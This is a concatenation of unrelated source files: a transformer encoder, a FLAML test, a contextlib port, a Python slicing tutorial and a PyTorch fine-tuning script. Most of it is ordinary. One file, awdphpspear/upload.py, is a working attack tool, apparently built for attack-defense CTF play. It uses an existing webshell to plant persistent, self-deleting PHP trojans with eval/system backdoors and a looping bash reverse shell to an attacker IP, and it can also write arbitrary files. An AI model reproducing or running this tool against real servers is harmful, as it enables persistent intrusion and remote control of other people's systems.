self.stdout.write("No accounts autorenewed")
|
NLP/EMNLP2021-SgSum/src/models/encoder.py | zhangyimi/Research | 1,319 | 12698084 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer encoder."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid.layers as layers
from models.neural_modules import positionwise_feed_forward, \
pre_process_layer, post_process_layer
from models.attention import multi_head_attention, multi_head_pooling, \
multi_head_structure_attention
def transformer_encoder_layer(query_input,
key_input,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name=''):
"""The encoder layers that can be stacked to form a deep encoder.
    This module consists of a multi-head (self) attention followed by
    position-wise feed-forward networks, both components wrapped with
    post_process_layer to add the residual connection, layer normalization
    and dropout.
"""
key_input = pre_process_layer(
key_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_att') if key_input else None
value_input = key_input if key_input else None
attn_output = multi_head_attention(
pre_process_layer(
query_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_att'),
key_input,
value_input,
attn_bias,
d_key,
d_value,
d_model,
n_head,
attention_dropout,
param_initializer=param_initializer,
name=name + '_multi_head_att')
attn_output = post_process_layer(
query_input,
attn_output,
postprocess_cmd,
prepostprocess_dropout,
name=name + '_post_att')
ffd_output = positionwise_feed_forward(
pre_process_layer(
attn_output,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid,
d_model,
relu_dropout,
hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
return post_process_layer(
attn_output,
ffd_output,
postprocess_cmd,
prepostprocess_dropout,
name=name + '_post_ffn')
def transformer_encoder(enc_input,
attn_bias,
n_layer,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='transformer_encoder',
with_post_process=True):
"""
The encoder is composed of a stack of identical layers returned by calling
encoder_layer.
"""
for i in range(n_layer):
enc_output = transformer_encoder_layer(
enc_input,
None,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd,
postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i))
enc_input = enc_output
if with_post_process:
enc_output = pre_process_layer(
enc_output, preprocess_cmd, prepostprocess_dropout, name="post_encoder")
return enc_output
def self_attention_pooling_layer(enc_input,
attn_bias,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
n_block,
preprocess_cmd="n",
postprocess_cmd="da",
name='self_attention_pooling'):
"""
enc_input: # (batch_size, n_tokens, emb_dim)
attn_bias: # (batch_size, n_head, n_tokens, n_tokens)
"""
attn_output = multi_head_pooling(
keys=pre_process_layer(enc_input,
preprocess_cmd,
prepostprocess_dropout,
name=name + '_pre'), # add layer normalization
values=None,
attn_bias=attn_bias, # (batch_size, n_head, n_tokens, n_tokens)
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
name=name
) # (batch_sizes, d_model)
# print("n_block = %s" % n_block)
# print("attn_output.shape = %s" % str(attn_output.shape))
attn_output = layers.reshape(attn_output, shape=[-1, n_block, d_model])
# print("attn_output.shape = %s" % str(attn_output.shape))
pooling_output = layers.dropout(
attn_output,
dropout_prob=attention_dropout,
dropout_implementation="upscale_in_train",
is_test=False)
return pooling_output
def graph_encoder_layer(enc_input, # (batch_size, n_block, emb_dim)
attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name=''):
"""
:param enc_input: (batch_size, n_blocks, emb_dim)
:param attn_bias: (batch_size, n_head, n_blocks, n_blocks)
:param graph_attn_bias: (batch_size, n_head, n_blocks, n_blocks)
"""
#layers.Print(enc_input, message="enc_intput ", summarize=-1)
#layers.Print(attn_bias, message="attn_bias", summarize=-1)
#layers.Print(graph_attn_bias, message="graph_attn_bias", summarize=-1)
# (batch_size, n_block, d_model)
attn_output = multi_head_structure_attention(
queries=pre_process_layer(out=enc_input, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_attn'),
keys=None,
values=None,
attn_bias=attn_bias,
graph_attn_bias=graph_attn_bias,
pos_win=pos_win,
d_key=d_key,
d_value=d_value,
d_model=d_model,
n_head=n_head,
dropout_rate=attention_dropout,
name=name + '_graph_attn'
)
# add dropout and residual connection
attn_output = post_process_layer(prev_out=enc_input,
out=attn_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_attn')
ffd_output = positionwise_feed_forward(
x=pre_process_layer(out=attn_output, # add layer normalization
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_pre_ffn'),
d_inner_hid=d_inner_hid,
d_hid=d_model,
dropout_rate=relu_dropout,
hidden_act=hidden_act,
param_initializer=param_initializer,
name=name + '_ffn')
return post_process_layer(prev_out=attn_output, # add dropout and residual connection
out=ffd_output,
process_cmd=postprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post_ffn')
def graph_encoder(enc_words_output,
src_words_slf_attn_bias,
src_sents_slf_attn_bias,
graph_attn_bias,
cls_ids,
pos_win,
graph_layers,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='graph_encoder'):
"""
:param enc_words_output: # (batch_size, n_tokens, emb_dim)
:param src_words_slf_attn_bias: (batch_size, n_head, n_tokens, n_tokens)
:param src_sents_slf_attn_bias: (batch_size, n_head, n_block, n_block)
:param graph_attn_bias: (batch_size, n_head, n_block, n_block)
:param cls_ids: (batch_size, n_block, 2)
:return:
"""
sents_vec = layers.gather_nd(enc_words_output, cls_ids)
enc_input = sents_vec # (batch_size, n_block, d_model)
for i in range(graph_layers):
# (batch_size, n_block, emb_dim)
enc_output = graph_encoder_layer(
enc_input=enc_input, # (batch_size, n_block, emb_dim)
attn_bias=src_sents_slf_attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
enc_input = enc_output # (batch_size, n_block, emb_dim)
# add layer normalization
enc_output = pre_process_layer(out=enc_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return enc_output # (batch_size, n_block, emb_dim)
def pretrained_graph_encoder(sents_vec,
src_sents_slf_attn_bias,
graph_attn_bias,
pos_win,
graph_layers,
n_head,
d_key,
d_value,
d_model,
d_inner_hid,
prepostprocess_dropout,
attention_dropout,
relu_dropout,
hidden_act,
preprocess_cmd="n",
postprocess_cmd="da",
param_initializer=None,
name='pretrained_graph_encoder'):
"""
:param sents_vec: # (batch_size, n_blocks, emb_dim)
:param src_sents_slf_attn_bias: (batch_size, n_head, n_block, n_block)
:param graph_attn_bias: (batch_size, n_head, n_block, n_block)
:return:
"""
enc_input = sents_vec # (batch_size, n_block, d_model)
for i in range(graph_layers):
# (batch_size, n_block, emb_dim)
enc_output = graph_encoder_layer(
enc_input=enc_input, # (batch_size, n_block, emb_dim)
attn_bias=src_sents_slf_attn_bias, # (batch_size, n_head, n_block, n_block)
graph_attn_bias=graph_attn_bias, # (batch_size, n_head, n_block, n_block)
pos_win=pos_win,
n_head=n_head,
d_key=d_key,
d_value=d_value,
d_model=d_model,
d_inner_hid=d_inner_hid,
prepostprocess_dropout=prepostprocess_dropout,
attention_dropout=attention_dropout,
relu_dropout=relu_dropout,
hidden_act=hidden_act,
preprocess_cmd=preprocess_cmd,
postprocess_cmd=postprocess_cmd,
param_initializer=param_initializer,
name=name + '_layer_' + str(i)
)
enc_input = enc_output # (batch_size, n_block, emb_dim)
# add layer normalization
enc_output = pre_process_layer(out=enc_output,
process_cmd=preprocess_cmd,
dropout_rate=prepostprocess_dropout,
name=name + '_post')
return enc_output # (batch_size, n_block, emb_dim)
|
test/test_training_log.py | nmonarizqa/FLAML | 1,747 | 12698092 | <filename>test/test_training_log.py
import os
import unittest
from tempfile import TemporaryDirectory
from sklearn.datasets import fetch_california_housing
from flaml import AutoML
from flaml.training_log import training_log_reader
class TestTrainingLog(unittest.TestCase):
def test_training_log(self, path="test_training_log.log", estimator_list="auto"):
with TemporaryDirectory() as d:
filename = os.path.join(d, path)
# Run a simple job.
automl = AutoML()
automl_settings = {
"time_budget": 1,
"metric": "mse",
"task": "regression",
"log_file_name": filename,
"log_training_metric": True,
"mem_thres": 1024 * 1024,
"n_jobs": 1,
"model_history": True,
"train_time_limit": 0.1,
"verbose": 3,
# "ensemble": True,
"keep_search_state": True,
"estimator_list": estimator_list,
}
X_train, y_train = fetch_california_housing(return_X_y=True)
automl.fit(X_train=X_train, y_train=y_train, **automl_settings)
# Check if the training log file is populated.
self.assertTrue(os.path.exists(filename))
if automl.best_estimator:
estimator, config = automl.best_estimator, automl.best_config
model0 = automl.best_model_for_estimator(estimator)
print(model0.params["n_estimators"], config)
# train on full data with no time limit
automl._state.time_budget = None
model, _ = automl._state._train_with_config(estimator, config)
# assuming estimator & config are saved and loaded as follows
automl = AutoML()
automl.fit(
X_train=X_train,
y_train=y_train,
max_iter=1,
task="regression",
estimator_list=[estimator],
n_jobs=1,
starting_points={estimator: config},
)
print(automl.best_config)
# then the fitted model should be equivalent to model
assert (
str(model.estimator) == str(automl.model.estimator)
or estimator == "xgboost"
and str(model.estimator.get_dump())
== str(automl.model.estimator.get_dump())
or estimator == "catboost"
and str(model.estimator.get_all_params())
== str(automl.model.estimator.get_all_params())
)
with training_log_reader(filename) as reader:
count = 0
for record in reader.records():
print(record)
count += 1
self.assertGreater(count, 0)
automl_settings["log_file_name"] = None
automl.fit(X_train=X_train, y_train=y_train, **automl_settings)
automl._selected.update(None, 0)
automl = AutoML()
automl.fit(X_train=X_train, y_train=y_train, max_iter=0, task="regression")
def test_illfilename(self):
try:
self.test_training_log("/")
except IsADirectoryError:
print("IsADirectoryError happens as expected in linux.")
except PermissionError:
print("PermissionError happens as expected in windows.")
def test_each_estimator(self):
self.test_training_log(estimator_list=["xgboost"])
self.test_training_log(estimator_list=["catboost"])
self.test_training_log(estimator_list=["extra_tree"])
self.test_training_log(estimator_list=["rf"])
self.test_training_log(estimator_list=["lgbm"])
|
awdphpspear/upload.py | hillmanyoung/AWD | 146 | 12698100 | <reponame>hillmanyoung/AWD
import requests
import os
def trojan_implant(address,webshell,trojan,password):
payload = ''
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
payload += "'"
payload += trojan
payload += "'"
payload += ';$code='
payload += "'"
payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
payload += "'"
payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
    data = {password: payload}
try:
r = requests.get(address+webshell)
print address+webshell,"[+]Webshell Works Well."
except:
print address+webshell,"[-]Webshell Failed"
try:
r = requests.post(address+webshell,data=data,timeout=1)
if r.status_code == 200:
r = requests.get(address+trojan)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Trojan Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
except:
r = requests.get(address+trojan)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[-]Trojan Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
def trojan_implant_memory(address,webshell,trojan,ip,port,password):
payload = ''
payload += '$code = "<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
payload += ''
payload += "while(1){@system('bash -i >& /dev/tcp/"
payload += ip
payload += "/"
payload += str(port)
payload += ''' 0>&1');};";'''
payload += '$file = '
payload += '"'
payload += trojan
payload += '";'
payload += 'file_put_contents($file,$code);'
    data = {password: payload}
try:
r = requests.get(address+webshell)
print address+webshell,"[+]Webshell Works Well."
except:
print address+webshell,"[-]Webshell Failed."
try:
r = requests.post(address+webshell,data=data,timeout=1)
if r.status_code == 200:
r = requests.get(address+trojan,timeout=1)
print "[+]Implant Succeed."
print "[+]Trojan Content:",r.text
except:
r = requests.get(address+trojan,timeout=1)
print "[+]Implant Succeed."
print 'nc -lvvp '+str(port)+' To Connect.'
def file_implant(address,webshell,name,data,password):
payload = ''
payload += '$file='
payload += "'"
payload += name
payload += "';"
payload += '$code='
payload += "'"
payload += data
payload += "';"
payload += 'file_put_contents($file,$code);'
    file_data = {password: payload}
try:
r = requests.get(address+webshell)
print address,"[+]Webshell Works Well."
except:
print address,"[-]Webshell Failed"
try:
r = requests.post(address+webshell,data=file_data,timeout=1)
if r.status_code == 200:
r = requests.get(address+name)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Content:",r.text
print "*******************************************************"
except:
r = requests.get(address+name)
if r.status_code == 200:
print "[+]Implant Succeed."
print "[+]Content:",r.text
print "*******************************************************"
else:
print "[-]Implant Failed."
print "*******************************************************"
def check(address):
try:
r =requests.get(address)
if r.status_code == 200 :
print address,"[+]Living."
print "*******************************************************"
return 1
else:
print address,"[-]Dead."
print "*******************************************************"
return 0
except:
print address,"Dead."
print "*******************************************************"
return 0 |
src/main/resources/assets/openpython/opos/v1.1/lib/micropython/contextlib.py | fossabot/OpenPython | 126 | 12698116 | """Utilities for with-statement contexts. See PEP 343.
Original source code: https://hg.python.org/cpython/file/3.4/Lib/contextlib.py
Not implemented:
- redirect_stdout;
"""
import sys
from collections import deque
from ucontextlib import *
class closing(object):
"""Context to automatically close something at the end of a block.
Code like this:
with closing(<module>.open(<arguments>)) as f:
<block>
is equivalent to this:
f = <module>.open(<arguments>)
try:
<block>
finally:
f.close()
"""
def __init__(self, thing):
self.thing = thing
def __enter__(self):
return self.thing
def __exit__(self, *exc_info):
self.thing.close()
class suppress:
"""Context manager to suppress specified exceptions
After the exception is suppressed, execution proceeds with the next
statement following the with statement.
with suppress(FileNotFoundError):
os.remove(somefile)
# Execution still resumes here if the file was already removed
"""
def __init__(self, *exceptions):
self._exceptions = exceptions
def __enter__(self):
pass
def __exit__(self, exctype, excinst, exctb):
# Unlike isinstance and issubclass, CPython exception handling
# currently only looks at the concrete type hierarchy (ignoring
# the instance and subclass checking hooks). While Guido considers
# that a bug rather than a feature, it's a fairly hard one to fix
# due to various internal implementation details. suppress provides
# the simpler issubclass based semantics, rather than trying to
# exactly reproduce the limitations of the CPython interpreter.
#
# See http://bugs.python.org/issue12029 for more details
return exctype is not None and issubclass(exctype, self._exceptions)
# Inspired by discussions on http://bugs.python.org/issue13585
class ExitStack(object):
"""Context manager for dynamic management of a stack of exit callbacks
For example:
with ExitStack() as stack:
files = [stack.enter_context(open(fname)) for fname in filenames]
# All opened files will automatically be closed at the end of
# the with statement, even if attempts to open files later
# in the list raise an exception
"""
def __init__(self):
self._exit_callbacks = deque()
def pop_all(self):
"""Preserve the context stack by transferring it to a new instance"""
new_stack = type(self)()
new_stack._exit_callbacks = self._exit_callbacks
self._exit_callbacks = deque()
return new_stack
def _push_cm_exit(self, cm, cm_exit):
"""Helper to correctly register callbacks to __exit__ methods"""
def _exit_wrapper(*exc_details):
return cm_exit(cm, *exc_details)
self.push(_exit_wrapper)
def push(self, exit):
"""Registers a callback with the standard __exit__ method signature
Can suppress exceptions the same way __exit__ methods can.
Also accepts any object with an __exit__ method (registering a call
to the method instead of the object itself)
"""
# We use an unbound method rather than a bound method to follow
# the standard lookup behaviour for special methods
_cb_type = type(exit)
try:
exit_method = _cb_type.__exit__
except AttributeError:
            # Not a context manager, so assume it's a callable
self._exit_callbacks.append(exit)
else:
self._push_cm_exit(exit, exit_method)
return exit # Allow use as a decorator
def callback(self, callback, *args, **kwds):
"""Registers an arbitrary callback and arguments.
Cannot suppress exceptions.
"""
def _exit_wrapper(exc_type, exc, tb):
callback(*args, **kwds)
self.push(_exit_wrapper)
return callback # Allow use as a decorator
def enter_context(self, cm):
"""Enters the supplied context manager
If successful, also pushes its __exit__ method as a callback and
returns the result of the __enter__ method.
"""
# We look up the special methods on the type to match the with statement
_cm_type = type(cm)
_exit = _cm_type.__exit__
result = _cm_type.__enter__(cm)
self._push_cm_exit(cm, _exit)
return result
def close(self):
"""Immediately unwind the context stack"""
self.__exit__(None, None, None)
def __enter__(self):
return self
def __exit__(self, *exc_details):
received_exc = exc_details[0] is not None
# Callbacks are invoked in LIFO order to match the behaviour of
# nested context managers
suppressed_exc = False
pending_raise = False
while self._exit_callbacks:
cb = self._exit_callbacks.pop()
try:
if cb(*exc_details):
suppressed_exc = True
pending_raise = False
exc_details = (None, None, None)
except:
exc_details = sys.exc_info()
pending_raise = True
if pending_raise:
raise exc_details[1]
return received_exc and suppressed_exc
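# Illustrative use of the pieces above (a sketch; not executed on import):
#
#     with ExitStack() as stack:
#         f = stack.enter_context(open("data.txt"))   # registers f's __exit__
#         stack.callback(print, "cleanup ran")        # arbitrary exit callback
#         later = stack.pop_all()                     # transfer both callbacks
#     # the with-block exits without running anything; later.close() then
#     # unwinds the transferred stack in LIFO order (prints, then closes f).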
|
第2章/program/String_List_Tuple.py | kingname/SourceCodeOfBook | 274 | 12698155 | example_string = '我是字符串'
example_list = ['我', '是', '列', '表']
example_tuple = ('我', '是', '元', '组')
print('1. Get the first element >', example_string[0], example_list[0], example_tuple[0])
print('2. Get the element at index 2 (the third element) >', example_string[2], example_list[2], example_tuple[2])
print('3. Get the last element >', example_string[-1], example_list[-1], example_tuple[-1])
print('4. Get the second-to-last element >', example_string[-2], example_list[-2], example_tuple[-2])
print('5. Slice 0:1 >', example_string[0:1], example_list[0:1], example_tuple[0:1])
print('6. Slice 0:2 >', example_string[0:2], example_list[0:2], example_tuple[0:2])
print('7. Slice 2:4 >', example_string[2:4], example_list[2:4], example_tuple[2:4])
print('8. Slice from the first element through index 1 >', example_string[:2], example_list[:2], example_tuple[:2])
print('9. Slice from index 1 to the end >', example_string[1:], example_list[1:], example_tuple[1:])
print('10. Slice off the last element >', example_string[:-1], example_list[:-1], example_tuple[:-1])
print('11. Slice off the last two elements >', example_string[:-2], example_list[:-2], example_tuple[:-2])
print('12. Take every second element >', example_string[::2], example_list[::2], example_tuple[::2])
print('13. Reverse the string, list and tuple >', example_string[::-1], example_list[::-1], example_tuple[::-1])
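# For reference (a sketch of the expected behaviour): with the five-character
# string above, [0:2] gives the first two characters, [:-1] drops the last one,
# and [::-1] reverses the sequence; the list and tuple behave identically
# because strings, lists and tuples all share Python's sequence
# indexing/slicing protocol.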
# string_1 = '你好'
# string_2 = '世界'
# string_3 = string_1 + string_2
# print(string_3)
#
#
# list_1 = ['abc', 'xyz']
# list_2 = ['哈哈哈哈', '嘿嘿嘿黑']
# list_3 = list_1 + list_2
# print(list_3)
#
# existed_list = [1, 2, 3]
# existed_list[1] = '新的值'
# print(existed_list)
#
# list_4 = ['Python', '爬虫']
# print(list_4)
# list_4.append('一')
# print(list_4)
# list_4.append('酷')
# print(list_4) |
trainFineTuneNYU.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 12698156 | import torch
import numpy as np
from torch.autograd import Variable
import torch.optim as optim
import argparse
import random
import os
import models
import torchvision.utils as vutils
import utils
import nyuDataLoader as dataLoader_nyu
import dataLoader as dataLoader_ours
import torch.nn as nn
from torch.utils.data import DataLoader
import torch.nn.functional as F
import wrapperBRDF as wcg
import wrapperNYU as wnyu
import scipy.io as io
import os.path as osp
parser = argparse.ArgumentParser()
# The location of the training set
parser.add_argument('--dataRoot', default=None, help='path to input images')
parser.add_argument('--NYURoot', default=None, help='path to the NYU dataset')
parser.add_argument('--experimentBRDF', default=None, help='path to the model for BRDF prediction')
parser.add_argument('--experiment', default=None, help='the path to store samples and models')
# The basic training setting
parser.add_argument('--nepochBRDF', type=int, default=14, help='the number of epochs for BRDF prediction')
parser.add_argument('--nepoch', type=int, default=2, help='the number of epochs for training')
parser.add_argument('--batchSize', type=int, default=8, help='input batch size')
parser.add_argument('--imHeight', type=int, default=240, help='the height / width of the input image to network')
parser.add_argument('--imWidth', type=int, default=320, help='the height / width of the input image to network')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--deviceIds', type=int, nargs='+', default=[0, 1], help='the gpus used for training network')
# The training weight
parser.add_argument('--albedoWeight', type=float, default=0.75, help='the weight for the diffuse component')
parser.add_argument('--normalWeight', type=float, default=0.5, help='the weight for the diffuse component')
parser.add_argument('--roughWeight', type=float, default=0.25, help='the weight for the roughness component')
parser.add_argument('--depthWeight', type=float, default=0.25, help='the weight for depth component')
# The training weight on NYU
parser.add_argument('--normalNYUWeight', type=float, default=4.5, help='the weight for the diffuse component')
parser.add_argument('--depthNYUWeight', type=float, default=4.5, help='the weight for depth component')
# Cascade Level
parser.add_argument('--cascadeLevel', type=int, default=0, help='the cascade level')
# The detail network setting
opt = parser.parse_args()
print(opt)
opt.gpuId = opt.deviceIds[0]
torch.multiprocessing.set_sharing_strategy('file_system')
if opt.experiment is None:
opt.experiment = 'check_cascadeNYU%d' % opt.cascadeLevel
os.system('mkdir {0}'.format(opt.experiment) )
os.system('cp *.py %s' % opt.experiment )
if opt.experimentBRDF is None:
opt.experimentBRDF = 'check_cascade0_w%d_h%d' % (opt.imWidth, opt.imHeight )
albeW, normW = opt.albedoWeight, opt.normalWeight
rougW = opt.roughWeight
deptW = opt.depthWeight
normNYUW = opt.normalNYUWeight
depthNYUW = opt.depthNYUWeight
opt.seed = 0
print("Random Seed: ", opt.seed )
random.seed(opt.seed )
torch.manual_seed(opt.seed )
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
####################################
# Initial Network
encoder = models.encoder0(cascadeLevel = opt.cascadeLevel )
albedoDecoder = models.decoder0(mode=0 )
normalDecoder = models.decoder0(mode=1 )
roughDecoder = models.decoder0(mode=2 )
depthDecoder = models.decoder0(mode=4 )
####################################################################
#########################################
encoder.load_state_dict( torch.load('{0}/encoder{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
albedoDecoder.load_state_dict( torch.load('{0}/albedo{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
normalDecoder.load_state_dict( torch.load('{0}/normal{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
roughDecoder.load_state_dict( torch.load('{0}/rough{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
depthDecoder.load_state_dict( torch.load('{0}/depth{1}_{2}.pth'.format(opt.experimentBRDF,
opt.cascadeLevel, opt.nepochBRDF-1 ) ).state_dict() )
lr_scale = 0.5
#########################################
encoder = nn.DataParallel(encoder, device_ids = opt.deviceIds )
albedoDecoder = nn.DataParallel(albedoDecoder, device_ids = opt.deviceIds )
normalDecoder = nn.DataParallel(normalDecoder, device_ids = opt.deviceIds )
roughDecoder = nn.DataParallel(roughDecoder, device_ids = opt.deviceIds )
depthDecoder = nn.DataParallel(depthDecoder, device_ids = opt.deviceIds )
############## ######################
# Send things into GPU
if opt.cuda:
encoder = encoder.cuda(opt.gpuId )
albedoDecoder = albedoDecoder.cuda(opt.gpuId )
normalDecoder = normalDecoder.cuda(opt.gpuId )
roughDecoder = roughDecoder.cuda(opt.gpuId )
depthDecoder = depthDecoder.cuda(opt.gpuId )
####################################
####################################
# Optimizer
opEncoder = optim.Adam(encoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opAlbedo = optim.Adam(albedoDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opNormal = optim.Adam(normalDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opRough = optim.Adam(roughDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
opDepth = optim.Adam(depthDecoder.parameters(), lr=1e-4 * lr_scale, betas=(0.5, 0.999) )
#####################################
####################################
brdfDataset = dataLoader_ours.BatchLoader( opt.dataRoot, imWidth = opt.imWidth, imHeight = opt.imHeight,
cascadeLevel = 0, isLight = False )
NYUDataset = dataLoader_nyu.NYULoader(
imRoot = osp.join(opt.NYURoot, 'images'),
normalRoot = osp.join(opt.NYURoot, 'normals'),
depthRoot = osp.join(opt.NYURoot, 'depths'),
segRoot = osp.join(opt.NYURoot, 'masks'),
imHeight = opt.imHeight,
imWidth = opt.imWidth,
phase = 'TRAIN' )
trainDataset = dataLoader_nyu.ConcatDataset(brdfDataset, NYUDataset)
brdfLoader = DataLoader(trainDataset, batch_size = opt.batchSize, num_workers =
6, shuffle = True)
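# Each element yielded by brdfLoader pairs one synthetic CGBRDF batch with one
# NYU batch (trainBatch[0] / trainBatch[1] in the loop below), so every
# iteration performs one supervised BRDF update followed by one NYU
# normal/depth update.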
j = 0
# BRDF loss accumulators
albedoErrsNpList = np.ones( [1, 1], dtype = np.float32 )
normalErrsNpList = np.ones( [1, 1], dtype = np.float32 )
roughErrsNpList= np.ones( [1, 1], dtype = np.float32 )
depthErrsNpList = np.ones( [1, 1], dtype = np.float32 )
normalNYUErrsNpList = np.ones([1, 1], dtype=np.float32 )
angleNYUErrsNpList = np.ones([1, 1], dtype = np.float32 )
depthNYUErrsNpList = np.ones([1, 1], dtype=np.float32 )
for epoch in list(range(0, opt.nepoch) ):
trainingLog = open('{0}/trainingLog_{1}.txt'.format(opt.experiment, epoch), 'w')
for i, trainBatch in enumerate(brdfLoader):
j += 1
dataBatch = trainBatch[0]
NYUBatch = trainBatch[1]
#####################################################################################################################
############################################# Train with CGBRDF dataset #############################################
#####################################################################################################################
# Clear the gradient in optimizer
opEncoder.zero_grad()
opAlbedo.zero_grad()
opNormal.zero_grad()
opRough.zero_grad()
opDepth.zero_grad()
albedoPair, normalPair, roughPair, depthPair \
= wcg.wrapperBRDF(dataBatch, opt, encoder,
albedoDecoder, normalDecoder, roughDecoder, depthDecoder )
albedoPred, albedoErr = albedoPair[0], albedoPair[1]
normalPred, normalErr = normalPair[0], normalPair[1]
roughPred, roughErr = roughPair[0], roughPair[1]
depthPred, depthErr = depthPair[0], depthPair[1]
# Back propagate the gradients
totalErr = 4 * albeW * albedoErr + normW * normalErr \
+ rougW *roughErr + deptW * depthErr
totalErr.backward()
# Update the network parameter
opEncoder.step()
opAlbedo.step()
opNormal.step()
opRough.step()
opDepth.step()
# Output training error
utils.writeErrToScreen('albedo', [albedoErr], epoch, j)
utils.writeErrToScreen('normal', [normalErr], epoch, j)
utils.writeErrToScreen('rough', [roughErr], epoch, j)
utils.writeErrToScreen('depth', [depthErr], epoch, j)
utils.writeErrToFile('albedo', [albedoErr], trainingLog, epoch, j)
utils.writeErrToFile('normal', [normalErr], trainingLog, epoch, j)
utils.writeErrToFile('rough', [roughErr], trainingLog, epoch, j)
utils.writeErrToFile('depth', [depthErr], trainingLog, epoch, j)
albedoErrsNpList = np.concatenate( [albedoErrsNpList, utils.turnErrorIntoNumpy( [albedoErr] )], axis=0)
normalErrsNpList = np.concatenate( [normalErrsNpList, utils.turnErrorIntoNumpy( [normalErr] )], axis=0)
roughErrsNpList = np.concatenate( [roughErrsNpList, utils.turnErrorIntoNumpy( [roughErr] )], axis=0)
depthErrsNpList = np.concatenate( [depthErrsNpList, utils.turnErrorIntoNumpy( [depthErr] )], axis=0)
if j < 1000:
utils.writeNpErrToScreen('albedoAccu', np.mean(albedoErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('normalAccu', np.mean(normalErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('roughAccu', np.mean(roughErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToScreen('depthAccu', np.mean(depthErrsNpList[1:j+1, :], axis=0), epoch, j )
utils.writeNpErrToFile('albedoAccu', np.mean(albedoErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('normalAccu', np.mean(normalErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('roughAccu', np.mean(roughErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
utils.writeNpErrToFile('depthAccu', np.mean(depthErrsNpList[1:j+1, :], axis=0), trainingLog, epoch, j)
else:
utils.writeNpErrToScreen('albedoAccu', np.mean(albedoErrsNpList[j-999:j+1, :], axis=0), epoch, j)
utils.writeNpErrToScreen('normalAccu', np.mean(normalErrsNpList[j-999:j+1, :], axis=0), epoch, j)
